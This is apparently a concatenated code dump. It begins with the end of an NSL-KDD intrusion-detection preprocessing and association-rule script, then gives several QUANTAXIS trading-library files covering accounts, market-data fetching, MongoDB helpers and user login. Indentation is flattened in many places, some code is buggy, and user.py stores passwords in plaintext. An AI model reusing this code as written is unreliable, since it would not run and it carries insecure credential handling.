# traindata = pd.read_csv('/home/administrator/PycharmProjects/Network-Intrusion-Detection-DNN/NSL-KDD-TEST/dataset/KDDTrain+_2.csv', header=None)
# testdata = pd.read_csv('/home/administrator/PycharmProjects/Network-Intrusion-Detection-DNN/NSL-KDD-TEST/dataset/KDDTest+_2.csv', header=None)
# Step 1: Data preprocessing:
# 1 attach the column names to the dataset (give every column its attribute name)
col_names = ["duration","protocol_type","service","flag","src_bytes",
"dst_bytes","land","wrong_fragment","urgent","hot","num_failed_logins",
"logged_in","num_compromised","root_shell","su_attempted","num_root",
"num_file_creations","num_shells","num_access_files","num_outbound_cmds",
"is_host_login","is_guest_login","count","srv_count","serror_rate",
"srv_serror_rate","rerror_rate","srv_rerror_rate","same_srv_rate",
"diff_srv_rate","srv_diff_host_rate","dst_host_count","dst_host_srv_count",
"dst_host_same_srv_rate","dst_host_diff_srv_rate","dst_host_same_src_port_rate",
"dst_host_srv_diff_host_rate","dst_host_serror_rate","dst_host_srv_serror_rate",
"dst_host_rerror_rate","dst_host_srv_rerror_rate","label"]
# 2 Load the Dataset
df = pd.read_csv(train_path, header=None, names = col_names)
df_test = pd.read_csv(test_path, header=None, names = col_names)
# shape, this gives the dimensions of the dataset
# print('Dimensions of the Training set:',df.shape)
# print('Dimensions of the Test set:',df_test.shape)
# first five rows of dataset
# print(df.head(5))
# print(df.describe())
# Label Distribution of Training and Test set
# print('Label distribution Training set:')
# print(df['label'].value_counts())
# print()
# print('Label distribution Test set:')
# print(df_test['label'].value_counts())
# check which features are categorical rather than numeric and turn them into numeric codes; columns that are categorical and not binary yet: protocol_type (column 2), service (column 3), flag (column 4).
# explore categorical features
# print('Training set:')
# for col_name in df.columns:
# if df[col_name].dtypes == 'object' :
# unique_cat = len(df[col_name].unique())
# print("Feature '{col_name}' has {unique_cat} categories".format(col_name=col_name, unique_cat=unique_cat))
# see how distributed the feature service is, it is evenly distributed and therefore we need to make dummies for all.
# print()
# print('Distribution of categories in service:')
# print(df['service'].value_counts().sort_values(ascending=False).head())
# Test set
# print('Test set:')
# for col_name in df_test.columns:
# if df_test[col_name].dtypes == 'object' :
# unique_cat = len(df_test[col_name].unique())
# print("Feature '{col_name}' has {unique_cat} categories".format(col_name=col_name, unique_cat=unique_cat))
# 3 pick the categorical features that need numeric encoding: 'protocol_type', 'service', 'flag'
# insert code to get a list of categorical columns into a variable, categorical_columns
categorical_columns=['protocol_type', 'service', 'flag','label']
# first extract the data for these categorical columns into df_categorical_values and testdf_categorical_values
df_categorical_values = df[categorical_columns]
testdf_categorical_values = df_test[categorical_columns]
# print(df_categorical_values.head())
# extract the remaining discrete (binary) features
se_column = ["land","logged_in","root_shell","su_attempted","is_host_login","is_guest_login"]
df_sep_values = df[se_column]
testdf_sep_values = df_test[se_column]
for feature in se_column:
df_sep_values[feature].replace([0,1],['no_'+feature,feature],inplace=True)
# print(df_sep_values.head())
newdf = pd.DataFrame()
newdf =pd.concat([df_sep_values,df_categorical_values], axis=1)
print(newdf.head())
newdf = np.array(newdf)
newdf = newdf.tolist()
print(newdf[1])
print(newdf[2])
# association rule generation
def generateRules(L, supportData, minConf=0.7):
bigRuleList = []
for i in range(1, len(L)):
for freqSet in L[i]:
H1 = [frozenset([item]) for item in freqSet]
if (i > 1):
                # itemsets with three or more elements
rulesFromConseq(freqSet, H1, supportData, bigRuleList, minConf)
else:
                # two-element itemsets
calcConf(freqSet, H1, supportData, bigRuleList, minConf)
return bigRuleList
def calcConf(freqSet, H, supportData, brl, minConf=0.7):
    ''' evaluate the candidate rule set '''
prunedH = []
for conseq in H:
conf = supportData[freqSet] / supportData[freqSet - conseq]
if conf >= minConf:
            print(freqSet - conseq, '-->', conseq, 'conf:', conf)
brl.append((freqSet - conseq, conseq, conf))
prunedH.append(conseq)
return prunedH
def rulesFromConseq(freqSet, H, supportData, brl, minConf=0.7):
    ''' generate the candidate rule sets '''
m = len(H[0])
if (len(freqSet) > (m + 1)):
        Hmpl = aprioriGen(H, m + 1)  # note: aprioriGen is assumed to come from an Apriori implementation; it is not defined in this file
Hmpl = calcConf(freqSet, Hmpl, supportData, brl, minConf)
if (len(Hmpl) > 1):
rulesFromConseq(freqSet, Hmpl, supportData, brl, minConf)
if __name__ == '__main__':
    '''
    call find_frequent_itemsets() to generate the frequent itemsets
    @:param minimum_support: the minimum support threshold; an itemset is kept
        if its support is >= minimum_support, otherwise it is dropped
    @:param include_support: whether the result includes the support; if
        include_support=True the result contains (itemset, support) pairs,
        otherwise only the itemsets
    '''
frequent_itemsets = fpg.find_frequent_itemsets(newdf, minimum_support=4, include_support=True)
print(type(frequent_itemsets)) # print type
result = []
    for itemset, support in frequent_itemsets:  # collect the generator results into a list
result.append((itemset, support))
    # result = sorted(result, key=lambda i: i[0])  # sort before printing
for itemset, support in result:
print(str(itemset) + ' ' + str(support))
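    # note: generateRules() above expects Apriori-style inputs (per-length
    # itemset levels plus a support dict); to reuse it with these FP-growth
    # results they would first need to be regrouped, e.g. (sketch):
    #
    #     supportData = {frozenset(items): sup for items, sup in result}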
``` |
{
"source": "5267/QUANTAXIS",
"score": 3
} |
#### File: QUANTAXISMessageQueue/socket/example_socket.py
```python
import websocket
import threading
import time
from websocket import create_connection
def on_message(ws, message):
print (message)
def on_error(ws, error):
print( error)
def on_close(ws):
print ("### closed ###")
def on_open(ws):
    def run(*args):
        for i in range(3):
            time.sleep(1)
            ws.send("Hello %d" % i)
        time.sleep(1)
        ws.close()
        print ("thread terminating...")
    # run in a background thread so the socket's event loop is not blocked
    threading.Thread(target=run).start()
if __name__ == "__main__":
ws = websocket.WebSocketApp("ws://localhost:8000/",
on_message = on_message,
on_error = on_error,
on_close = on_close)
ws.send("login")
print ("Sent")
print ("Receiving...")
result = ws.recv()
print ("Received '%s'" % result)
ws.on_open = on_open
ws.close()
ws.run_forever()
```
#### File: QUANTAXIS/QAARP/__init__.py
```python
from .QAAccount import QA_Account
from .QARisk import QA_Risk
from .QAPortfolio import QA_Portfolio
class QA_ARP():
def __init__(self):
pass
def QA_ARP_A2R(self,QA_Account,QA_Risk):
pass
def QA_ARP_R2P(self,QA_Risk,QA_Portfolio):
pass
def QA_ARP_P2R(self,QA_Risk,QA_Portfolio):
pass
def QA_ARP_R2A(self,QA_Account,QA_Risk):
pass
```
#### File: QUANTAXIS/QAARP/QAAccount.py
```python
from QUANTAXIS.QAUtil import QA_util_log_info
from QUANTAXIS.QABacktest import QAAnalysis as Ana
from .QARisk import *
import random
import datetime
class QA_Account:
assets=1000
portfolio={'date':'', 'id':'N',' price':'', 'amount':0}
history_trade=[['date', 'id',' price', 'amount',' towards']]
total_profit=[0]
total_cur_profit_present=[0]
assets_market_hold_value=0
assets_profit_total=[0]
cur_profit_present_total=[0]
cur_profit_present=0
#date, id, price, amount, towards
#account_cookie=str(random.random())
portfit=0
hold=0
def init(self):
#assets=1000
self.portfolio={'date':'', 'id':'N',' price':'', 'amount':0}
self.history_trade=[['date', 'id',' price', 'amount',' towards']]
self.total_profit=[0]
self.total_cur_profit_present=[0]
self.assets_market_hold_value=0
self.assets_profit_total=[0]
self.cur_profit_present_total=[0]
self.cur_profit_present=0
#date, id, price, amount, towards
self.account_cookie=str(random.random())
self.portfit=0
self.account_date=[]
self.hold=0
self.total_date=[]
self.total_assest=[self.assets]
self.assets_free=self.total_assest[-1]
self.total_assest_free=[self.assets_free]
self.message={
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':'',
'strategy':''
}
},
'body':{
'account':{
'init_assest':self.assets,
'portfolio':{'date':'', 'id':'N',' price':'', 'amount':0},
'history':[['date', 'id',' price', 'amount',' towards']],
'assest_now':self.total_assest[-1],
'assest_history':self.total_assest,
'assest_free':self.assets_free,
'total_assest_free':self.total_assest_free,
'assest_fix':self.assets_market_hold_value,
'account_date':self.account_date,
'total_date':self.total_date,
'profit':self.portfit,
'total_profit':[0],
'cur_profit_present':0,
'cur_profit_present_total':[0],
'hold':self.hold
},
'bid':{},
'market':{},
#'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
}
}
def QA_account_get_cash(self):
return self.assets
def QA_account_get_portfolio(self):
return self.portfolio
def QA_account_get_amount(self):
pass
def QA_account_get_history(self):
return self.history_trade
def QA_Account_get_cookie(self):
return self.account_cookie
def QA_account_update(self,update_message,client):
#print(update_message)
self.total_date.append(update_message['date'])
if str(update_message['status'])[0]=='2':
            # the trade went through
            # towards > 0: buy filled
            # towards < 0: sell filled
            # pick up the new trade's price and related fields
self.account_date.append(update_message['date'])
# QA_util_log_info('Success')
new_id=update_message['id']
new_amount=update_message['amount']
new_trade_date=update_message['date']
new_towards=update_message['towards']
new_price=update_message['price']
            # compute returns and profit first
self.QA_account_calc_profit(update_message)
if int(new_towards)>0:
self.portfolio['date']=new_trade_date
self.portfolio['price']=new_price
self.portfolio['id']=new_id
self.portfolio['amount']=new_amount
self.hold=1
                # append the trade to the trade history
appending_list=[new_trade_date, new_id, new_price, new_amount, new_towards]
self.history_trade.append(appending_list)
else :
self.portfolio['date']=''
self.portfolio['price']=0
self.portfolio['id']='N'
self.portfolio['amount']=0
self.hold=0
                # append the trade to the trade history
appending_list=[new_trade_date, new_id, new_price, new_amount, new_towards]
self.history_trade.append(appending_list)
            # no further history insertion is needed here
self.message={
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':update_message['user'],
'strategy':update_message['strategy'],
'code':update_message['bid']['code']
}
},
'body':{
'account':{
'init_assest':self.total_assest[0],
'portfolio':self.portfolio,
'history':self.history_trade,
'assest_now':self.total_assest[-1],
'assest_history':self.total_assest,
'assest_free':self.assets_free,
'total_assest_free':self.total_assest_free,
'assest_fix':self.assets_market_hold_value,
'profit':self.total_profit[-1],
'account_date':self.account_date,
'assets_profit_day':0,
'assets_profit_total':[0],
'total_profit':self.total_profit,
'total_date':self.total_date,
'cur_profit_present':self.cur_profit_present,
'cur_profit_present_total':self.cur_profit_present_total,
'hold':self.hold
},
'bid':update_message['bid'],
'market':update_message['market'],
'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
}
}
elif update_message['status']==401:
            # the trade did not go through
            # 1. empty order: 401
            # 2. the buy/sell was not filled
self.QA_account_calc_profit(update_message)
self.account_date.append(update_message['date'])
#QA_util_log_info('hold without bid')
#print(update_message['user'])
message={
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':update_message['user'],
'strategy':update_message['strategy'],
'code':update_message['bid']['code']
}
},
'body':{
'account':{
'init_assest':self.assets,
'portfolio':self.portfolio,
'history':self.history_trade,
'assest_now':self.assets,
'assest_history':self.total_assest,
'assest_free':self.assets_free,
'total_assest_free':self.total_assest_free,
'assest_fix':self.assets_market_hold_value,
'profit':self.portfit,
'account_date':self.account_date,
'total_profit':self.total_profit,
'total_date':self.total_date,
'cur_profit_present':self.cur_profit_present,
'cur_profit_present_total':self.cur_profit_present_total,
'hold':self.hold
},
'bid':update_message['bid'],
'market':update_message['market'],
#'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
}
}
self.message=message
#print(message)
        # does not update history/portfolio, but still appends to the account and date records
elif update_message['status']==402:
#QA_util_log_info('bid not success')
message={
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':update_message['user'],
'strategy':update_message['strategy'],
'code':update_message['bid']['code']
}
},
'body':{
'account':{
'init_assest':self.assets,
'portfolio':self.portfolio,
'history':self.history_trade,
'assest_now':self.assets,
'assest_history':self.total_assest,
'total_assest_free':self.total_assest_free,
'assest_free':self.assets_free,
'assest_fix':self.assets_market_hold_value,
'profit':self.portfit,
'total_profit':self.total_profit,
'account_date':self.account_date,
'total_date':self.total_date,
'cur_profit_present':self.cur_profit_present,
'cur_profit_present_total':self.cur_profit_present_total,
'hold':self.hold
},
'bid':update_message['bid'],
'market':update_message['market'],
#'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
}
}
self.message=message
#print(self.message)
return self.message
def QA_account_renew(self):
        # reserved: to be sent to Risk and Portfolio in the future
pass
def QA_account_calc_profit(self,update_message):
# print(update_message)
if update_message['status']==200 and update_message['towards']==1:
            # buy
            # security value = value of the bought securities held to settlement (close price)
            now_price=float(update_message['market']['close']) # close price
            # the bought portion comes from update_message
buy_price=update_message['price']
            # free cash = previous free cash - cash spent on the buy
self.assets_free=float(self.total_assest_free[-1])-float(update_message['price'])*float(update_message['amount'])*update_message['towards']
            # update the free-cash history
self.total_assest_free.append(self.assets_free)
            # market value of the holding
self.assets_market_hold_value=update_message['amount']*now_price
self.assets=self.assets_free+self.assets_market_hold_value
self.total_assest.append(self.assets)
self.profit=(self.total_assest[-1]-self.total_assest[0])/self.total_assest[0]
self.total_profit.append(self.profit)
self.cur_profit_present=(now_price-float(update_message['price']))/(float(update_message['price']))
#print(now_price)
#print(self.portfolio['price'])
#self.assets_market_hold_value=float(now_price)*int(self.portfolio['amount'])
#success trade, buy
elif update_message['status']==200 and update_message['towards']==-1:
#success trade,sell
            # security value = value of the bought securities held to settlement (close price)
            now_price=float(update_message['market']['close']) # close price
            # the bought portion comes from update_message
buy_price=update_message['price']
            # on a sell, towards = -1, so the proceeds are added back
            # free cash = previous free cash + cash received from the sell
self.assets_free=float(self.total_assest_free[-1])-float(update_message['price'])*float(update_message['amount'])*update_message['towards']
            # update the free-cash history
self.total_assest_free.append(self.assets_free)
self.assets_market_hold_value=(self.portfolio['amount']-update_message['amount'])*now_price
self.assets=self.assets_free+self.assets_market_hold_value
self.total_assest.append(self.assets)
self.profit=(self.total_assest[-1]-self.total_assest[0])/self.total_assest[0]
self.total_profit.append(self.profit)
            # per-trade profit is measured against the buy price
self.cur_profit_present=(float(update_message['price'])-float(self.portfolio['price']))/float((self.portfolio['price']))
self.cur_profit_present_total.append(self.cur_profit_present)
elif update_message['status']==401 :
# hold
if (self.portfolio['amount']==0):
self.total_assest_free.append(self.assets_free)
#self.assets=self.assets_free+self.assets_market_hold_value
self.total_assest.append(self.assets)
self.profit=0
self.total_profit.append(self.profit)
self.cur_profit_present=0
self.cur_profit_present_total.append(self.cur_profit_present)
else:
now_price=float(update_message['market']['close'])
self.total_assest_free.append(self.assets_free)
self.assets_market_hold_value=self.portfolio['amount']*now_price
self.assets=self.assets_free+self.assets_market_hold_value
self.total_assest.append(self.assets)
self.profit=(self.total_assest[-1]-self.total_assest[0])/self.total_assest[0]
self.total_profit.append(self.profit)
self.cur_profit_present=(float(now_price)-float(self.portfolio['price']))/(float(self.portfolio['price']))
self.cur_profit_present_total.append(self.cur_profit_present)
        elif update_message['status']==402 :
            # note: the original checked update_message['update'], which looks
            # like a typo for 'status'
            pass
"""
profit=0
for item in range(1,len(self.history_trade),1):
# history:
# date, id, price, amount, towards
profit=profit-float(self.history_trade[item][2])*float(self.history_trade[item][3])*float(self.history_trade[item][4])
if str(self.portfolio['id'])[0]=='N' :
self.hold=0
else :self.hold=1
# calc
now_price=float(update_message['market']['close'])
if (int(self.hold==1)):
#QA_util_log_info('hold-=========================================')
            # (current price - buy price) * amount
profit=profit+(now_price-float(self.portfolio['price']))*int(self.portfolio['amount'])+float(self.history_trade[-1][2])*float(self.history_trade[-1][3])*float(self.history_trade[-1][4])
#print(now_price)
#print(self.portfolio['price'])
self.cur_profit_present=(now_price-float(self.portfolio['price']))/(float(self.portfolio['price']))
self.assets_market_hold_value=float(now_price)*int(self.portfolio['amount'])
self.assets=float(self.assets_free)+float(self.assets_market_hold_value)
else:
#QA_util_log_info('No hold-=========================================')
profit=profit
self.cur_profit_present=0
#print('---profit--')
#print(profit)
#print(now_price)
#print(self.portfolio['amount'])
"""
def QA_account_analysis(self):
pass
def QA_Account_get_message(self):
return self.message
def QA_account_receive_deal(self,message,client):
#print(message)
messages=self.QA_account_update({
'code':message['header']['code'],
'status':message['header']['status'],
'price':message['body']['bid']['price'],
'id':message['body']['bid']['code'],
'amount':message['body']['bid']['amount'],
'towards':message['body']['bid']['towards'],
'date':message['body']['bid']['time'],
'user':message['header']['session']['user'],
'strategy':message['header']['session']['strategy'],
'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp()),
'bid':message['body']['bid'],
'market':message['body']['market']
},client)
return messages
```
#### File: QAFetch/QACrawlData/__init__.py
```python
import QACrawlData.getdata as gt
def get_financial(symbol):  # the three major financial statements
    return gt.get_financial(symbol)
def get_ipo():  # new IPO listings
    return gt.ths_ipo()
def get_tfp(Date):  # trading halts and resumptions
    return gt.get_tfp(Date)
def get_brief(symbol_list):  # company profile
    return gt.get_brief(symbol_list)
def get_lastest(symbol_list):  # latest company info
    return gt.get_lastest(symbol_list)
def get_dividend(symbol):  # dividends
    return gt.get_dividend(symbol)
def get_allotment(symbol):  # rights issues
    return gt.get_allotment(symbol)
def get_fh_all():  # dividend data for all stocks in the current year
    return gt.get_fh_all()
def get_stocklist():  # full stock list
    return gt.get_stocklist()
def get_last_daybar(symbol_list):  # daily-bar cross-section for stocks
    return gt.get_last_dailybar(symbol_list)
def get_last_tick(symbol_list):  # last tick
    return gt.get_last_tick(symbol_list)
def get_last100_ticks(symbol_list):  # last 100 ticks
    return gt.get_last100_ticks(symbol_list)
def get_all_ticks(symbol_list):  # all ticks for the current day
    return gt.get_all_ticks(symbol_list)
def get_moneyflow(symbol_list):  # money-flow cross-section for the current day
    return gt.get_moneyflow(symbol_list)
def get_money_on_minute(symbol):  # per-minute money flow for the current day
    return gt.get_money_on_minute(symbol)
def get_tick_history(symbol,Date):  # historical tick interface
    return gt.get_tick_history(symbol,Date)
def get_fjb(tick):
    return tick.groupby(['close']).sum()
def tick_to_min(tick,n):
    return gt.tick_to_min(tick,n)
def get_last_n_daybar(symbol,n,Type):  # cs = ['600100', 200, 'qfq']
    cs= [symbol,n,Type]
    return gt.get_last_n_dailybars(cs)
def get_all_daybar(symbol,Type):  # cs = ['600100', 'qfq']
    cs =[symbol,Type]
    return gt.get_all_dailybars(cs)
def get_yearlist(symbol):
    cs =[symbol,'bfq']
    return gt.get_yearlist(cs)
def get_daybar_year(symbol,year,Type):
    cs = [symbol,year,Type]
    return gt.get_dailybars_year(cs)
def get_stock_bar(symbol,Type):  # real-time quote interface
    cs=[symbol,Type]
    return gt.get_bars(cs)
def get_money_30days(symbol):  # 30-day money-flow data
    return gt.get_money_30days(symbol)
def get_future_list(id):  # contracts grouped by exchange/product, e.g. id = 'dce' or id = 'dce.c'
    return gt.get_future_list(id)
def get_future_symbol(id):  # all contract codes for one product
    var =get_future_list(id)
    return list(var[0].index)
def get_zhuli():  # get the dominant (main) contracts
    return gt.get_zhuli()
def get_future_bars(symbol,Type):  # futures minute and daily bars
    cs=[symbol,Type]
    return gt.get_future_bars(cs)
def get_future_info(symbol):  # basic info of a futures contract
    return gt.future_info(symbol)
def get_calendar(starttime,endtime):  # trading calendar
    return gt.get_calendar(starttime,endtime)
def get_future_tick(symbol):  # futures tick data
    return gt.get_future_tick(symbol)
```
#### File: QUANTAXIS/QAFetch/QAGmsdk.py
```python
import datetime
from gmsdk import md,to_dict
import pandas as pd
md.init('13382753152', '<PASSWORD>')  # credentials redacted
CFFEX = ['IF','IH','IC','T','TF']
CZCE =['CF','FG','MA','RM','SR','TA','ZC']
SHFE = ['AL','BU','CU','HC','NI','RB','RU','SN','ZN']
DCE=['C','CS','I','J','JD','JM','L','M','P','PP','V','Y']
def mtsymbol_list(symbol_list):
z = len (symbol_list)
ret = ''
for i in range(z):
ret = ret + symbol_list[i] +','
ret = ret[:len(ret)-1]
return ret
def to_pd(var,index):
ret =[]
for i in var:
ret.append(to_dict(i))
ret = pd.DataFrame (ret)
ret = ret.set_index(index)
return ret
def get_shse( ):
var =md.get_instruments('SHSE', 1, 0)
return to_pd(var,'symbol')
def get_szse():
var =md.get_instruments('SZSE', 1, 0)
return to_pd(var,'symbol')
def get_shfe():
var = md.get_instruments('SHFE', 4, 1)
return to_pd(var,'symbol')
def get_dce():
var = md.get_instruments('DCE', 4, 1)
return to_pd(var,'symbol')
def get_czce():
var = md.get_instruments('CZCE', 4, 1)
return to_pd(var,'symbol')
def get_cffex():
var = md.get_instruments('CFFEX', 4, 1)
return to_pd(var,'symbol')
def get_index():
shse = md.get_instruments('SHSE', 3, 1)
shse =to_pd(shse,'symbol')
szse = md.get_instruments('SZSE', 3, 1)
szse =to_pd(szse,'symbol')
return shse.append(szse)
def get_etf():
shse = md.get_instruments('SHSE', 5, 0)
return to_pd(shse,'symbol')
def get_fund():
shse = md.get_instruments('SHSE', 2, 0)
shse =to_pd(shse,'symbol')
szse = md.get_instruments('SZSE', 2, 0)
szse =to_pd(szse,'symbol')
return shse.append(szse)
def get_instruments_by_name(name):  # futures interface
var = md.get_instruments_by_name(name)
z = len(var)
for i in range (z):
k = z-1-i
if var[k].is_active == 0:
del var[k]
return to_pd(var,'symbol')
def get_constituents(index_symbol):  # index constituent weights
var = md.get_constituents(index_symbol)
return to_pd(var,'symbol')
def get_financial_index(symbol, t_begin, t_end):
if len(t_begin) < 10 :
t_begin = t_begin + ' 00:00:00'
if len(t_end) < 10 :
t_end = t_end + ' 15:00:00'
var =md.get_financial_index(symbol, t_begin, t_end)
var =to_pd(var,'pub_date')
return var
def get_last_financial_index(symbol_list):
var = md.get_last_financial_index(mtsymbol_list(symbol_list))
var = to_pd(var,'symbol')
return var
def get_share_index(symbol_list):
var = md.get_last_share_index(mtsymbol_list(symbol_list))
var = to_pd(var, 'symbol')
return var
def get_market_index(symbol_list):
var = md.get_last_market_index(mtsymbol_list(symbol_list))
var = to_pd(var, 'symbol')
return var
def get_calendar(exchange, start_time, end_time):
var = md.get_calendar(exchange, start_time, end_time)
ret = []
for i in var:
Date = datetime.datetime.utcfromtimestamp(i.utc_time)
ret.append (Date)
return ret
#### market data (md) helpers
def tick_topd(var,index):
ret = []
for i in var:
tmp = {}
Date = datetime.datetime.utcfromtimestamp(i.utc_time)
Date = Date + datetime.timedelta(hours=8)
tmp['date'] = Date
tmp['code'] = i.exchange + '.' + i.sec_id
tmp['close'] = i.last_price
tmp['vol'] = i.last_volume
tmp['amount'] = i.last_amount
tmp['opi'] = i.cum_position
        tmp['买一价'] = i.bids[0][0]  # best bid price
        tmp['买一量'] = i.bids[0][1]  # best bid volume
        tmp['卖一价'] = i.asks[0][0]  # best ask price
        tmp['卖一量'] = i.asks[0][1]  # best ask volume
ret.append(tmp)
ret = pd.DataFrame(ret)
ret = ret.set_index(index)
return ret
def get_ticks(symbol, begin_time, end_time):
var = md.get_ticks(symbol, begin_time, end_time)
ret = tick_topd(var,'date')
return ret
def bar_topd(var,index):
ret = []
z = len(var)
for j in range (z):
i =var[j]
tmp = {}
Date = datetime.datetime.utcfromtimestamp(i.utc_time)
Date = Date + datetime.timedelta(hours=8)
tmp['date'] = Date
tmp['code'] = i.exchange + '.' + i.sec_id
tmp['close'] = i.close
tmp['high'] = i.high
tmp['low'] = i.low
tmp['open'] = i.open
tmp['vol'] = i.volume
tmp['amount'] = i.amount
if i.exchange in ['SHSE','SZSE'] :
tmp['adj'] = i.adj_factor
else:
tmp['opi'] = i.position
ret.append(tmp)
ret = pd.DataFrame(ret)
ret = ret.set_index(index)
return ret
def get_bars(symbol, bar_type, begin_time, end_time):
var = md.get_bars(symbol, bar_type, begin_time, end_time)
ret = bar_topd(var,'date')
return ret
def get_dailybars(symbol, begin_time, end_time):
var = md.get_dailybars(symbol, begin_time, end_time)
ret = bar_topd(var,'date')
return ret
def get_last_ticks(symbol_list):
symbol_list = mtsymbol_list(symbol_list)
var = md.get_last_ticks(symbol_list)
ret = tick_topd(var,'code')
return ret
def get_last_bars(symbol_list, bar_type):
symbol_list = mtsymbol_list(symbol_list)
var = md.get_last_bars(symbol_list, bar_type)
ret = bar_topd(var,'code')
return ret
def get_last_dailybars(symbol_list):
symbol_list = mtsymbol_list(symbol_list)
var = md.get_last_dailybars(symbol_list)
ret = bar_topd(var,'code')
return ret
def get_last_n_ticks(symbol, n):
end_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
var = md.get_last_n_ticks(symbol, n, end_time)
ret = tick_topd(var,'date')
return ret
def get_last_n_bars(symbol, bar_type, n):
end_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
VAR = md.get_last_n_bars(symbol, bar_type, n, end_time)
z = len(VAR)
var = []
for i in range(z):
var.append(VAR[z-1-i])
ret = bar_topd(var,'date')
return ret
def get_last_n_dailybars(symbol, n):
end_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
VAR = md.get_last_n_dailybars(symbol, n, end_time)
z = len(VAR)
var = []
for i in range(z):
var.append(VAR[z-1-i])
ret = bar_topd(var,'date')
return ret
```
#### File: Engine/utils/url.py
```python
from hashlib import sha1
from urllib.parse import urlparse, urlencode, urlsplit, urlunsplit, quote
def url_fingerprint(url):
h = sha1()
h.update(url.encode('utf-8'))
return h.hexdigest()
def safe_url(url, remove_empty_query=True):
scheme, netloc, path, query, fragment = urlsplit(url)
if not query:
return url.rstrip('/')
# Sort all the queries
queries = []
for q in query.split('&'):
if '=' not in q:
return url
key, value = q.split('=')
if remove_empty_query and not value:
continue
queries.append((key, value))
queries.sort(key=lambda x: x[0])
query = urlencode(queries)
return urlunsplit((scheme, netloc, path, query, fragment)).rstrip('/')
def base_url(url):
parser = urlparse(url)
return '://'.join((parser.scheme or 'http', parser.netloc))
def main():
url = (safe_url('http://fanyi.baidu.com/translate?jlfal=测试&aldtype=16047&ell='))
print(url)
print(safe_url('https://movie.douban.com/subject/2353023'))
if __name__ == '__main__':
main()
```
#### File: wallstreetCN/spiders/mongodbQuery.py
```python
import pymongo
import json
class querylist(object):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['wsc']
def queryMongodbSame(self,collname,keyname,keycontent):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['wsc']
coll = db[collname]
count = coll.find({keyname:keycontent}).count()
return count
def checkDifferentDatabase(self,col1,col2,keyname1,keyname2,x):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['wsc']
coll1 = db[col1]
coll2 = db[col2]
countnum=0
for url in coll1.find():
urlx=url[keyname1]
print (col2)
print (keyname1)
print (urlx)
count = self.queryMongodbSame(col2,keyname2,urlx)
print (count)
if count == x:
print ('none in the db2')
print (countnum)
else:
print ('already in')
continue
countnum+=1
print (countnum)
print (countnum)
```
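A hedged usage sketch for `querylist` above (the collection and field names are hypothetical; a local MongoDB with the `wsc` database is assumed):
```python
# Requires a running mongod on 127.0.0.1:27017; names below are illustrative.
ql = querylist()
dup_count = ql.queryMongodbSame('articles', 'url', 'http://example.com/post/1')
print(dup_count)  # documents in 'articles' with that exact url
# count urls from 'articles' that have zero matches in 'archive'
ql.checkDifferentDatabase('articles', 'archive', 'url', 'url', 0)
```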
#### File: QUANTAXIS/QASU/update_tushare.py
```python
from QUANTAXIS.QAFetch import QATushare
from QUANTAXIS.QAUtil import QA_util_date_stamp,QA_Setting,QA_util_date_valid
import json
import pymongo
import datetime
import re
import time
def QA_update_stock_day(name, startDate, endDate):
    # Fetch the daily bars; the original discarded the result, so return it
    # for the caller to persist.
    data = QATushare.QA_fetch_get_stock_day(name, startDate, endDate)
    return data
def QA_update_stock_day_all(code,client):
coll_stocklist=client.quantaxis.stock_list
stock_list=coll_stocklist.find_one()['stock']['code']
coll_stock_day=client.quantaxis.stock_day
for item in stock_list:
#coll.find({'code':str(item)[0:6]}).count()
        # First get the trade date of the last stored record.
start_date=coll_stock_day.find({'code':str(item)[0:6]})[coll_stock_day.find({'code':str(item)[0:6]}).count()-1]['date']
end_date=str(datetime.date.today())
data=QATushare.QA_fetch_get_stock_day(str(item)[0:6],start_date,end_date)[1::]
coll_stock_day.insert_many(data)
def QA_update_standard_sql():
print('正在整理和更新数据,请稍等.....')
coll=pymongo.MongoClient().quantaxis.stock_day
coll.ensure_index('code')
"""
for item in coll.find():
date=item['date']
date_stamp=QA_util_date_stamp(date)
coll.update({"_id":item['_id']},{'$set':{'date_stamp':date_stamp}})
"""
```
#### File: QUANTAXIS/QASU/user.py
```python
from QUANTAXIS.QAUtil import QA_util_log_info
def QA_user_sign_in(name,password,clients):
coll=clients.quantaxis.user_list
if (coll.find({'username':name,'password':password}).count() >0):
QA_util_log_info('success login! your username is:'+str(name))
return True
else:
        QA_util_log_info('Failed to log in, please check your password')
return False
def QA_user_sign_up(name,password,clients):
coll=clients.quantaxis.user_list
if (coll.find({'username':name}).count() >0):
        QA_util_log_info('user name already exists')
else :
coll.insert({'username':name,'password':password})
        QA_util_log_info('Successfully signed up! Please log in.')
```
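A hedged usage sketch for the sign-up/sign-in helpers above (assumes a reachable MongoDB instance):
```python
import pymongo

client = pymongo.MongoClient()                   # assumes mongod on localhost:27017
QA_user_sign_up('alice', 'secret', client)       # inserts the record if missing
ok = QA_user_sign_in('alice', 'secret', client)  # True when the pair matches
```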
#### File: QUANTAXIS/QATask/tasks.py
```python
from celery import Celery
import QUANTAXIS
quantaxis = Celery('tasks', backend='amqp://guest@localhost//', broker='amqp://guest@localhost//')
@quantaxis.task
def save_data(payload):  # renamed from 'all' to avoid shadowing the builtin
pass
def update_data():
pass
def update_spider(name):
pass
def update_all_spiders():
pass
```
#### File: QUANTAXIS/QAUtil/QASetting.py
```python
from QUANTAXIS.QAUtil import QA_util_log_info,QA_util_sql_mongo_setting
from QUANTAXIS.QASU.user import QA_user_sign_in,QA_user_sign_up
class QA_Setting():
QA_util_sql_mongo_ip='127.0.0.1'
QA_util_sql_mongo_port='27017'
client=QA_util_sql_mongo_setting(QA_util_sql_mongo_ip,QA_util_sql_mongo_port)
QA_setting_user_name=''
QA_setting_user_password=''
user={'username':'','password':'','login':False}
def QA_setting_init(self):
